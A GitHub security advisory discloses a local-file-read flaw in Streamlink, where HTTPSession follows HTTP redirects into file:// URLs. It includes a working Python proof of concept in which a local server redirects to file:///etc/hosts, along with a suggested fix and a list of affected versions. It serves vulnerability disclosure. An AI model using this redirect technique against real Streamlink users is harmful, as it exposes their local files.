GHSA-vf2x-4v53-pm7v

Suggest an improvement
Source
https://github.com/advisories/GHSA-vf2x-4v53-pm7v
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-vf2x-4v53-pm7v/GHSA-vf2x-4v53-pm7v.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-vf2x-4v53-pm7v
Aliases
Published
2026-09-24T14:58:04Z
Modified
2026-09-24T15:15:04Z
Severity
  • 6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N CVSS Calculator
Summary
Streamlink: HTTPSession follows HTTP redirects into file:// URLs, reading local files
Details

Summary

HTTPSession mounts a FileAdapter for the file:// scheme and inherits redirect handling unchanged from requests.Session. requests does not check for scheme downgrades or cross-protocol transitions when it follows a redirect, so any http(s) request Streamlink makes can be redirected by the remote server into file:///... and the local file is returned as the response body.

GHSA-hgqw-6m45-hw5f / CVE-2026-44353 fixed direct file:// segment and playlist URIs in HLS playlists and DASH manifests. Those checks look at the URL as it appears in the manifest, so a manifest that lists an ordinary https:// URL passes them, and the redirect happens later at fetch time. The attack surface is the same one that advisory describes, but the flaw is one level down in HTTPSession rather than in the streaming implementations, so it applies to every request the session makes and not only to segment and manifest fetches.

Affected version

Executed against released streamlink 8.5.0 (PyPI, installed into a clean venv on Python 3.12).

Attacker model

The attacker controls a URL the victim's Streamlink run reaches: a playlist or manifest URL passed on the command line, or any http(s) URL referenced from attacker-controlled manifest content. No privileges on the victim host and no file:// input are required, and the file:// scheme never appears in anything the victim or the manifest parser sees.

Proof of concept, executed

import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

from streamlink.exceptions import StreamError
from streamlink.session.http import HTTPSession

class H(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/segment":
            self.send_response(302)
            self.send_header("Location", "file:///etc/hosts")
            self.end_headers()
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, *a):
        pass

srv = HTTPServer(("127.0.0.1", 0), H)
port = srv.server_port
threading.Thread(target=srv.serve_forever, daemon=True).start()

s = HTTPSession()
res = s.get(f"http://127.0.0.1:{port}/segment", exception=StreamError, timeout=5)
print("requested   http://127.0.0.1:%d/segment" % port)
print("final_url  ", res.url)
print("status     ", res.status_code)
print("content    ", res.content[:40])
srv.shutdown()

Output:

requested   http://127.0.0.1:52205/segment
final_url   file:///etc/hosts
status      200
content     b'##\n# Host Database\n#\n# localhost is used'

The request goes out over http, the response comes back from the local filesystem, and nothing in between rejects the scheme change. Substituting a path the attacker wants read for /etc/hosts returns that file's contents into whatever consumes the response, which for a segment fetch means the file is written into the stream output.

Suggested fix

Override get_redirect_target() or resolve_redirects() on HTTPSession and reject a redirect whose target scheme is not the same as the request's scheme or a permitted upgrade of it. Doing it on the session rather than through a response hook keeps plugin authors from removing the check by overriding hooks. Custom protocol adapters can still redirect, but only to https or to their own scheme.

AI tooling

AI assistance was used for the code audit and for drafting this report. The finding was manually verified against the project's source at the location cited above before reporting it, and the severity and impact assessment are my own.

Database specific
{
    "cwe_ids":  [
        "CWE-73"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2026-09-24T14:58:04Z",
    "nvd_published_at":  "2026-09-23T15:17:29Z",
    "severity":  "MODERATE"
}
References

Affected packages

PyPI / streamlink

Package

Name
streamlink
View open source insights on deps.dev
Purl
pkg:pypi/streamlink

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
8.6.0

Affected versions

0.*
0.0.1
0.0.2
0.1.0
0.2.0
0.3.0
0.3.1
0.3.2
0.4.0
0.5.0
0.6.0
0.7.0
0.8.1
0.9.0
0.10.0
0.11.0
0.12.0
0.12.1
0.13.0
0.14.0
0.14.2
1.*
1.0.0
1.1.0
1.1.1
1.2.0
1.3.0
1.3.1
1.4.0
1.4.1
1.5.0
1.6.0
1.7.0
2.*
2.0.0
2.1.0
2.1.1
2.1.2
2.2.0
2.3.0
2.4.0
3.*
3.0.0
3.0.1
3.0.2
3.0.3
3.1.0
3.1.1
3.2.0
4.*
4.0.0
4.0.1
4.1.0
4.2.0
4.3.0
5.*
5.0.0
5.0.1
5.1.0
5.1.1
5.1.2
5.2.1
5.3.0
5.3.1
5.4.0
5.5.0
5.5.1
6.*
6.0.0
6.0.1
6.1.0
6.2.0
6.2.1
6.3.0
6.3.1
6.4.0
6.4.1
6.4.2
6.5.0
6.5.1
6.6.0
6.6.1
6.6.2
6.7.0
6.7.1
6.7.2
6.7.3
6.7.4
6.8.0
6.8.1
6.8.2
6.8.3
6.9.0
6.10.0
6.11.0
7.*
7.0.0
7.1.0
7.1.1
7.1.2
7.1.3
7.2.0
7.3.0
7.4.0
7.5.0
7.6.0
8.*
8.0.0
8.1.0
8.1.1
8.1.2
8.2.0
8.2.1
8.3.0
8.4.0
8.5.0

Database specific

last_known_affected_version_range
"<= 8.5.0"
source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-vf2x-4v53-pm7v/GHSA-vf2x-4v53-pm7v.json"